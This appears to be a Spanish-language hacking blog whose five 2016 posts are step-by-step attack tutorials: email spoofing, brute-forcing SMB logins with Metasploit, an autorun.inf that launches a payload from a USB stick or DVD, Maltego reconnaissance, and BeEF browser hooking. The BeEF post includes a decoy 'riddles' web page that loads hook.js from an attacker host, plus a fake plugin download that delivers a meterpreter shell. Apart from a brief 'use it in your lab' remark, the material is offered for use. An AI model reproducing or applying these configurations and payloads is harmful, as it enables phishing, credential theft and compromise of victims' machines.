viernes, 29 de abril de 2016

email spoofing


Entramos en la página https://emkei.cz/


No tenemos más que rellenar los campos y envíar el correo (eso sí, en hotmail, gmail y demás le llegarán a la carpeta de spam)


Recordad que no debéis cometer ilegalidades.

viernes, 22 de abril de 2016

Intrusión por netbíos

En primer lugar, vamos a averiguar la contraseña, eso sí, el sistema víctima tiene que tener  NETBIOS activado.

La máquina víctima tendrá la IP 192.168.1.129

En primer lugar iniciamos metasploit y usamos el módulo auxiliar smb_login:

use auxiliary/scanner/smb/smb_login

configuramos:

set RHOSTS: 192.168.1.129

Si queremos poner un usuario concreto tendremos que configurar el usuario con SMBUser.

Si queremos poner una contraseña concreta tendremos que configurar la misma con SMBPass

Si queremos probar que el usuario y la contraseña son las mismas, lo haríamos con USER_AS_PASS.

En mi caso, tengo un diccionario de usuarios y otro de contraseñas (un diccionario es un listado de palabras que irá probando sucesivamente hasta que dé con la que realmente sea).

set USER_FILE /root/usuarios

set PASS_FILE /root/contraseñas



Bien, pues ya tenemos los usuarios: Windows7 y la contraseña:1234; usuario y la contraseña usuario.

Abrimos el explorador de archivos y nos vamos al equipo; introducimos la contraseña y ya tenemos acceso.


viernes, 15 de abril de 2016

Infectar un USB/DVD

En primer lugar, creamos una carpeta llamada “autorun”.

Creamos un payload (yo voy a usar el payload que cree en el post de veil) y lo copiamos en esta carpeta.

Editamos el archivo autorun.inf y lo llenamos como sigue:

[autorun]
open=manugomez1977.exe
icon=autorun.ico

Guardamos y cerramos.

Por supesto que, en open, ponemos el payload que hayamos creado.

Copiamos el contenido de esta carpeta en un pen (para insertar un pen en la máquina virtual, lo metemos en el puerto y seleccionamos Dispositivos → USB → Seleccionamos el usb a insertar) o bien lo grabamos en un cd – dvd grabable.

Ojo, hay que poner en el directorio raíz del pen el archivo autorun.inf y el ejecutable, en mi caso manugomez1977, no más. Así de simple.

Sin embargo, en los pen, no se ejecuta automáticamente, a la víctima se le abrirá un menú que le preguntará qué quiere hacer.

En un dvd/cdrom se ejecuta automáticamente.

viernes, 8 de abril de 2016

Búsqueda de información con Maltego

Maltego es una herramienta para buscar información sobre un objetivo, podremos ver las referencias en sus redes sociales, localizaciones, nombres de dominio, etc.

Abrimos maltego:



Siguiente



Rellenamos los campos, si no estáis registrados, vais a “register here”, vamos a suponer que no estamos registrados y que nos vamos a registrar, entonces nos saltará el navegador:



una vez que ya estamos registrados, ponemos nuestros datos



Le damos siguiente



En principio, no elegimos a ninguna máquina ahora, así que le damos a la última opción



Ahora ya sí, nos vamos a la pestaña de las máquinas y elegimos una.

Las máquinas nos van a permitir buscar según que cosas,

Elegimos la opción “Run Machines”



Os preguntaréis que porqué lo he echo así. La respuesta es que sepáis otra manera de acceder.

Elegiré la opción:



Le damos a next



Ponemos la url objetivo y le damos a Finish.

Y empezará a trabajar.

Clickeando en el botón derecho del gráfico que nos saldrá, podremos ver más opciones.


viernes, 1 de abril de 2016

Beef

Beef es un framework que nos permite inyecciones XSS, las cuales nos indica la IP, nos da las características del equipo, lanzar exploits, etc.

En primer lugar, hay que cofigurarlo:

editamos /usr/share/beef-xss/config.yaml



En metasploit ponemos

enable: true

En evasion ponemos

enable: true



Guardamos y salimos.

Creamos un archivo beef.rc que contiene:

load msgrpc ServerHost=IPLOCAL Pass=abc123 (o si habéis cambiado la pass, la que sea).

Msgrpc es un servicio de Metasploit que le permite conectarse a aplicaciones externas.



Guardamos

Ahora editamos /usr/share/beef-xss/extensions/metasploit/config.yaml

En la parte de metasploit, en host, cambiamos 127.0.0.1 por la IP local.

En callback_host, cambiamos 127.0.0.1 por la IP local.

Beef tiene una página web por defecto, pero nosotros vamos a crear una:

<!doctype html>
<HTML lang=es>
<head>
        <title>Los Mejores acertijos</title>
</head>

<script src="http://192.168.1.134:3000/hook.js"type="text/javascript"</javascript>
<script>
var commandModuleStr='script src="'+window.location.protocol+'//'+window.location.host+'hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr);
</script>
<body>

<br>
Has sido hackeado, te fastidias
<br>
</body>

</html>











La guardaremos e iniciaremos apache

service apache2 start

En el directorio /usr/share/beef-xss, ponemos

msfconsole -r beef.rc

Y en otra consola

./beef



Abrimos el navegador y ponemos la dirección:





username: beef
password: beef



Cuando la víctima pone:




Y nosotros ya lo tenemos como zombie:



Por ejemplo, podemos hacerle tragar un payload con la opción:


La víctima recibirá un mensaje en la que se le dice que tiene que descargar un pluggin, y, en realidad, será un payload que hemos creado. Ambas cosas las tendremos que configurar y darle al botón de ejecutar.

A la víctima le sale:



Y al ejectuarlo, ya tenemos nuestra sesión de meterpreter:



Otro día echaremos un vistazo a más cosas que se pueden hacer.

Recordad: Usad esto en vuestro laboratorio, sed, legales.